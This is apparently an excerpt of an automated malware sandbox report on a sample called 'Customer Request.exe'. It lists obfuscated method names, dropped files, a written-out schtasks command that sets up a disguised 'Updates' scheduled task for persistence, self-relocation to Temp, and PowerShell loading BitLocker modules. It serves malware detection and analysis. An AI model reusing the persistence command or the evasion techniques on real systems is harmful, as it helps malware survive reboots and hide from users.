                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, hleLjQqobPJH1iTO5g.csHigh entropy of concatenated method names: 'dHVavvS7Kx', 'dIUagGZcrU', 'a7Ka4CUNq6', 'RC4aqVN00F', 'lFea9jXgh3', 'VHZaKdXXOy', 'EXKaOptlIU', 'AEga3qj5GT', 'xlQa8UfEBs', 'OgnaSbiRLm'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, Lw2SpOc5C8xC14K5eyu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mhsS7PHfLV', 'ylbSZREJxg', 'tKsSGbFHRQ', 'rdgSsCuRS7', 'oAKSELiUVa', 'Lj4Sk2DjfX', 'PuKSp8rTGL'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, VDpgCYcPsRT7I193x5H.csHigh entropy of concatenated method names: 'Gr52e42U75', 'QiA2zqfryx', 'pw3A50cRQK', 'njxWXwgPjxwfF4EwWu4', 'UVwkBngq5OZUHAeECG7', 'h9mYTKg10xqUbyEtQZo', 'ULEjAtg5PkEDQO6Vyl2', 'WlMv0sgtN1wRrX4O9C5'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, Y2ncPE6QhKHr2reXlY.csHigh entropy of concatenated method names: 'Dispose', 'HnfcmUEfUG', 'UaTnlmSIyD', 'RNVLRMiOkb', 'aBicet0tEK', 'Y3HczJybVM', 'ProcessDialogKey', 'uI5n5e0uF1', 'kLancy0Cmt', 'zyLnnN6b0Q'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, EyRq7giU4A3bn2IwLa.csHigh entropy of concatenated method names: 'nTb0wDZtN7', 'jUT0dvUVuW', 'AUg0T8dP7n', 'w5f0vCN3Kn', 'YyF0h3EU23', 'Rnp0gx8nTd', 'GFY0MY29uQ', 'WUP04xuyud', 's2W0q2qhbW', 'ItB0H2o8TE'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, k4ceGZkW8oS0OdyGo0.csHigh entropy of concatenated method names: 'ToString', 'feJK7Uin1m', 'FKBKlV8ern', 'SBIK1htgX1', 'Df1KosL5p8', 'IOnKF3yAq1', 'pJtKtM1rYy', 'h3EKRQDAOk', 'RIBKQbe4cT', 'KGcKiQnRme'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, nwa3brccgEIZB7CI0Yl.csHigh entropy of concatenated method names: 'u9cSeX3WEQ', 'b8LSzlTOAc', 'oP025LniZm', 'XTY2c9pYTy', 'htI2n9xkHM', 'NCO2P87bGf', 'YnZ2YKPHlq', 'aMw2I3XZRP', 'vsr2uqGq4f', 'nPo26gq66F'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, U6b0Q7eVMSchg0E0I1.csHigh entropy of concatenated method names: 'ySQSaxnYuG', 'DbnSr5iCl5', 'NmmSybifIw', 'WgcS019Esb', 'BDqS8385GS', 'LW4Sj4X3gn', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, zTcnkLHLej3bfwggl5.csHigh entropy of concatenated method names: 'dQNrhNstWE', 'pperM4rk1q', 'ccOa12nvqU', 'PjlaoIyYsZ', 'E3TaF9jsJ9', 'jZaatET0hq', 'c2GaRaI1sZ', 'wunaQIJuLD', 'GeRainDDCE', 'gOaabXA1Is'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.csHigh entropy of concatenated method names: 'EAYPILJFaE', 'sABPu5lPI8', 'CvuP6yMuvL', 'aOEPaO0X8Y', 'fHoPrF9Mac', 'MLnPyJoaQR', 'BUvP0sypIR', 'GgbPjmdtFr', 'MtsPLhdEgD', 'N4dPfDvhmI'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, MKTCX2WxWtgjxOuELw.csHigh entropy of concatenated method names: 'pCKyItwBiL', 'O1Uy6jlNXO', 'NF5yrD8ORo', 'Xvcy00W9bl', 'iFKyjRD0D0', 'xTcrVl4JgE', 'ke0rNvSQaZ', 'KxurxGPpfZ', 'rParBknmXA', 'keirmAHEvu'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, ae0uF1mjLay0CmtTyL.csHigh entropy of concatenated method names: 'Dn08WiZOBj', 'VOg8laJbJD', 'B4c81gh8Tn', 'ESg8oLpE8B', 'UKJ8Ff4x2v', 'aLe8t8uwHI', 'i1u8Re4S1Y', 'l6f8QatBgg', 'XwD8i1wCNH', 'zkY8b8NEXb'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, Yj3H6mYy1Ppbqq7ICB.csHigh entropy of concatenated method names: 'sqqc0qMLXp', 'g8acjnp44v', 'LobcfPJH1i', 'zO5cJgTTcn', 'xggc9l5iKT', 'nX2cKxWtgj', 'fFkKLklBuSt4kUtSsM', 'fuv58yiQhrJGZxxk1C', 'rVJccJvRRD', 'W5NcPaLqVh'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, voPa4KNBAHLu7NiUhY.csHigh entropy of concatenated method names: 'iAGOBpnepM', 'r5QOe4Vymd', 'aBm35XyCUB', 'JLw3cxy2Rb', 'JSLO7bftSD', 'AYgOZ8LEPb', 'QriOGPwdII', 'EHVOsWwhtR', 'Cw0OEepUaq', 'Ib6OkZ8qAh'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, eigfv4x9C1nfUEfUG5.csHigh entropy of concatenated method names: 'f6G89siqHV', 'ers8Osmx04', 'PAO88eFEcV', 'eUm82d5W6Y', 'Dtn8XlL45i', 'W7w8UpTBBs', 'Dispose', 'UTu3uKKAij', 'nA436uVP10', 'G3q3a7Ljmt'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, l3KgVTaQOpQLbPQ7Vd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CVwnmXGfuk', 'uxgneF3sGS', 'o7wnz2B7rS', 'YCNP5lkVF3', 'Q5pPcGFem1', 'Ww0Pnm4ANC', 'jYNPPC2ETv', 'NhDcgnRafqyVPlIpU3d'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, TZrpZ4RP1a6x3HlVwy.csHigh entropy of concatenated method names: 'rtQ0uG5eT3', 'nCc0aWAEjc', 'Sq40yFHxZE', 'Vi6yesWZyG', 'DAayztlnSm', 'dnL05ILylX', 'C5u0cXtp9A', 'H3a0nxd0rC', 'VsH0Pkf7R1', 'jC20YfaaNR'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, eF83cRcY6Eg33QpsSPn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhxA8x9o7C', 'X84ASdUKf6', 'Fb4A2J5B6f', 'I9HAAmKiiq', 'Ty6AXswBQF', 'rT3ADASovC', 'ePnAUq3uS0'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, EqMLXp468anp44vyd9.csHigh entropy of concatenated method names: 'SxT6s0AFmK', 'HAB6Ei0QYN', 'k4x6kna052', 'eSd6pbsEx2', 'Oiw6Vx07w0', 'XOH6N5K9u2', 'gom6xPHbc4', 'QuH6BgpFGx', 'j3x6mwfccC', 'DAV6ecNQyL'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, pgNG05o8KRp2IrkESO.csHigh entropy of concatenated method names: 'fePyUy3x0c', 'WLAywjqVtq', 'HRYyTeIkv3', 'ftryvhj1y4', 'i9fyg50XNo', 'zdeyMsPEvE', 'm28yqb7jHc', 'gkOyHPTKeQ', 'IxnTM1FbxaTKR26JOCM', 'rP2QssF3lQD00dffJw3'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, LSj5QTGLmePXRUoOpu.csHigh entropy of concatenated method names: 'Y1IC4e9TMO', 'I3QCq412j9', 'W00CWTs1pm', 'BYHClXoFs7', 'GAGCoEQ17R', 'gh0CFrOe7s', 'vUWCR9TuP4', 'nn0CQlcS8h', 'YemCbakB7c', 'ET2C7Tx0BK'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, lpRipOnrG8qpZxZ10k.csHigh entropy of concatenated method names: 'LjqTceHBW', 'NJevmCc7Z', 'SPhgHdISO', 'apwMesxvG', 'UX9q6qMul', 'RxUHIW8s3', 'QeDpaTrEuoVoVwiTZ8', 'bGViOJddVf9Emfyphw', 'yIt3fkshy', 'ORYSv1xNC'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, hleLjQqobPJH1iTO5g.csHigh entropy of concatenated method names: 'dHVavvS7Kx', 'dIUagGZcrU', 'a7Ka4CUNq6', 'RC4aqVN00F', 'lFea9jXgh3', 'VHZaKdXXOy', 'EXKaOptlIU', 'AEga3qj5GT', 'xlQa8UfEBs', 'OgnaSbiRLm'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, Lw2SpOc5C8xC14K5eyu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mhsS7PHfLV', 'ylbSZREJxg', 'tKsSGbFHRQ', 'rdgSsCuRS7', 'oAKSELiUVa', 'Lj4Sk2DjfX', 'PuKSp8rTGL'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, VDpgCYcPsRT7I193x5H.csHigh entropy of concatenated method names: 'Gr52e42U75', 'QiA2zqfryx', 'pw3A50cRQK', 'njxWXwgPjxwfF4EwWu4', 'UVwkBngq5OZUHAeECG7', 'h9mYTKg10xqUbyEtQZo', 'ULEjAtg5PkEDQO6Vyl2', 'WlMv0sgtN1wRrX4O9C5'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, Y2ncPE6QhKHr2reXlY.csHigh entropy of concatenated method names: 'Dispose', 'HnfcmUEfUG', 'UaTnlmSIyD', 'RNVLRMiOkb', 'aBicet0tEK', 'Y3HczJybVM', 'ProcessDialogKey', 'uI5n5e0uF1', 'kLancy0Cmt', 'zyLnnN6b0Q'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, EyRq7giU4A3bn2IwLa.csHigh entropy of concatenated method names: 'nTb0wDZtN7', 'jUT0dvUVuW', 'AUg0T8dP7n', 'w5f0vCN3Kn', 'YyF0h3EU23', 'Rnp0gx8nTd', 'GFY0MY29uQ', 'WUP04xuyud', 's2W0q2qhbW', 'ItB0H2o8TE'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, k4ceGZkW8oS0OdyGo0.csHigh entropy of concatenated method names: 'ToString', 'feJK7Uin1m', 'FKBKlV8ern', 'SBIK1htgX1', 'Df1KosL5p8', 'IOnKF3yAq1', 'pJtKtM1rYy', 'h3EKRQDAOk', 'RIBKQbe4cT', 'KGcKiQnRme'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, nwa3brccgEIZB7CI0Yl.csHigh entropy of concatenated method names: 'u9cSeX3WEQ', 'b8LSzlTOAc', 'oP025LniZm', 'XTY2c9pYTy', 'htI2n9xkHM', 'NCO2P87bGf', 'YnZ2YKPHlq', 'aMw2I3XZRP', 'vsr2uqGq4f', 'nPo26gq66F'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, U6b0Q7eVMSchg0E0I1.csHigh entropy of concatenated method names: 'ySQSaxnYuG', 'DbnSr5iCl5', 'NmmSybifIw', 'WgcS019Esb', 'BDqS8385GS', 'LW4Sj4X3gn', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, zTcnkLHLej3bfwggl5.csHigh entropy of concatenated method names: 'dQNrhNstWE', 'pperM4rk1q', 'ccOa12nvqU', 'PjlaoIyYsZ', 'E3TaF9jsJ9', 'jZaatET0hq', 'c2GaRaI1sZ', 'wunaQIJuLD', 'GeRainDDCE', 'gOaabXA1Is'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.csHigh entropy of concatenated method names: 'EAYPILJFaE', 'sABPu5lPI8', 'CvuP6yMuvL', 'aOEPaO0X8Y', 'fHoPrF9Mac', 'MLnPyJoaQR', 'BUvP0sypIR', 'GgbPjmdtFr', 'MtsPLhdEgD', 'N4dPfDvhmI'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, MKTCX2WxWtgjxOuELw.csHigh entropy of concatenated method names: 'pCKyItwBiL', 'O1Uy6jlNXO', 'NF5yrD8ORo', 'Xvcy00W9bl', 'iFKyjRD0D0', 'xTcrVl4JgE', 'ke0rNvSQaZ', 'KxurxGPpfZ', 'rParBknmXA', 'keirmAHEvu'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, ae0uF1mjLay0CmtTyL.csHigh entropy of concatenated method names: 'Dn08WiZOBj', 'VOg8laJbJD', 'B4c81gh8Tn', 'ESg8oLpE8B', 'UKJ8Ff4x2v', 'aLe8t8uwHI', 'i1u8Re4S1Y', 'l6f8QatBgg', 'XwD8i1wCNH', 'zkY8b8NEXb'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, Yj3H6mYy1Ppbqq7ICB.csHigh entropy of concatenated method names: 'sqqc0qMLXp', 'g8acjnp44v', 'LobcfPJH1i', 'zO5cJgTTcn', 'xggc9l5iKT', 'nX2cKxWtgj', 'fFkKLklBuSt4kUtSsM', 'fuv58yiQhrJGZxxk1C', 'rVJccJvRRD', 'W5NcPaLqVh'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, voPa4KNBAHLu7NiUhY.csHigh entropy of concatenated method names: 'iAGOBpnepM', 'r5QOe4Vymd', 'aBm35XyCUB', 'JLw3cxy2Rb', 'JSLO7bftSD', 'AYgOZ8LEPb', 'QriOGPwdII', 'EHVOsWwhtR', 'Cw0OEepUaq', 'Ib6OkZ8qAh'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, eigfv4x9C1nfUEfUG5.csHigh entropy of concatenated method names: 'f6G89siqHV', 'ers8Osmx04', 'PAO88eFEcV', 'eUm82d5W6Y', 'Dtn8XlL45i', 'W7w8UpTBBs', 'Dispose', 'UTu3uKKAij', 'nA436uVP10', 'G3q3a7Ljmt'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, l3KgVTaQOpQLbPQ7Vd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CVwnmXGfuk', 'uxgneF3sGS', 'o7wnz2B7rS', 'YCNP5lkVF3', 'Q5pPcGFem1', 'Ww0Pnm4ANC', 'jYNPPC2ETv', 'NhDcgnRafqyVPlIpU3d'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, TZrpZ4RP1a6x3HlVwy.csHigh entropy of concatenated method names: 'rtQ0uG5eT3', 'nCc0aWAEjc', 'Sq40yFHxZE', 'Vi6yesWZyG', 'DAayztlnSm', 'dnL05ILylX', 'C5u0cXtp9A', 'H3a0nxd0rC', 'VsH0Pkf7R1', 'jC20YfaaNR'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, eF83cRcY6Eg33QpsSPn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhxA8x9o7C', 'X84ASdUKf6', 'Fb4A2J5B6f', 'I9HAAmKiiq', 'Ty6AXswBQF', 'rT3ADASovC', 'ePnAUq3uS0'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, EqMLXp468anp44vyd9.csHigh entropy of concatenated method names: 'SxT6s0AFmK', 'HAB6Ei0QYN', 'k4x6kna052', 'eSd6pbsEx2', 'Oiw6Vx07w0', 'XOH6N5K9u2', 'gom6xPHbc4', 'QuH6BgpFGx', 'j3x6mwfccC', 'DAV6ecNQyL'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, pgNG05o8KRp2IrkESO.csHigh entropy of concatenated method names: 'fePyUy3x0c', 'WLAywjqVtq', 'HRYyTeIkv3', 'ftryvhj1y4', 'i9fyg50XNo', 'zdeyMsPEvE', 'm28yqb7jHc', 'gkOyHPTKeQ', 'IxnTM1FbxaTKR26JOCM', 'rP2QssF3lQD00dffJw3'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, LSj5QTGLmePXRUoOpu.csHigh entropy of concatenated method names: 'Y1IC4e9TMO', 'I3QCq412j9', 'W00CWTs1pm', 'BYHClXoFs7', 'GAGCoEQ17R', 'gh0CFrOe7s', 'vUWCR9TuP4', 'nn0CQlcS8h', 'YemCbakB7c', 'ET2C7Tx0BK'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, lpRipOnrG8qpZxZ10k.csHigh entropy of concatenated method names: 'LjqTceHBW', 'NJevmCc7Z', 'SPhgHdISO', 'apwMesxvG', 'UX9q6qMul', 'RxUHIW8s3', 'QeDpaTrEuoVoVwiTZ8', 'bGViOJddVf9Emfyphw', 'yIt3fkshy', 'ORYSv1xNC'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, hleLjQqobPJH1iTO5g.csHigh entropy of concatenated method names: 'dHVavvS7Kx', 'dIUagGZcrU', 'a7Ka4CUNq6', 'RC4aqVN00F', 'lFea9jXgh3', 'VHZaKdXXOy', 'EXKaOptlIU', 'AEga3qj5GT', 'xlQa8UfEBs', 'OgnaSbiRLm'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, Lw2SpOc5C8xC14K5eyu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mhsS7PHfLV', 'ylbSZREJxg', 'tKsSGbFHRQ', 'rdgSsCuRS7', 'oAKSELiUVa', 'Lj4Sk2DjfX', 'PuKSp8rTGL'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, VDpgCYcPsRT7I193x5H.csHigh entropy of concatenated method names: 'Gr52e42U75', 'QiA2zqfryx', 'pw3A50cRQK', 'njxWXwgPjxwfF4EwWu4', 'UVwkBngq5OZUHAeECG7', 'h9mYTKg10xqUbyEtQZo', 'ULEjAtg5PkEDQO6Vyl2', 'WlMv0sgtN1wRrX4O9C5'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, Y2ncPE6QhKHr2reXlY.csHigh entropy of concatenated method names: 'Dispose', 'HnfcmUEfUG', 'UaTnlmSIyD', 'RNVLRMiOkb', 'aBicet0tEK', 'Y3HczJybVM', 'ProcessDialogKey', 'uI5n5e0uF1', 'kLancy0Cmt', 'zyLnnN6b0Q'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, EyRq7giU4A3bn2IwLa.csHigh entropy of concatenated method names: 'nTb0wDZtN7', 'jUT0dvUVuW', 'AUg0T8dP7n', 'w5f0vCN3Kn', 'YyF0h3EU23', 'Rnp0gx8nTd', 'GFY0MY29uQ', 'WUP04xuyud', 's2W0q2qhbW', 'ItB0H2o8TE'
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, k4ceGZkW8oS0OdyGo0.csHigh entropy of concatenated method names: 'ToString', 'feJK7Uin1m', 'FKBKlV8ern', 'SBIK1htgX1', 'Df1KosL5p8', 'IOnKF3yAq1', 'pJtKtM1rYy', 'h3EKRQDAOk', 'RIBKQbe4cT', 'KGcKiQnRme'
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeFile created: C:\Users\user\AppData\Local\Temp\tmpG548.tmp (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\Customer Request.exeFile created: C:\Users\user\AppData\Roaming\gCFuOglEso.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Moves itself to temp directory
                  Source: c:\users\user\desktop\customer request.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG103.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
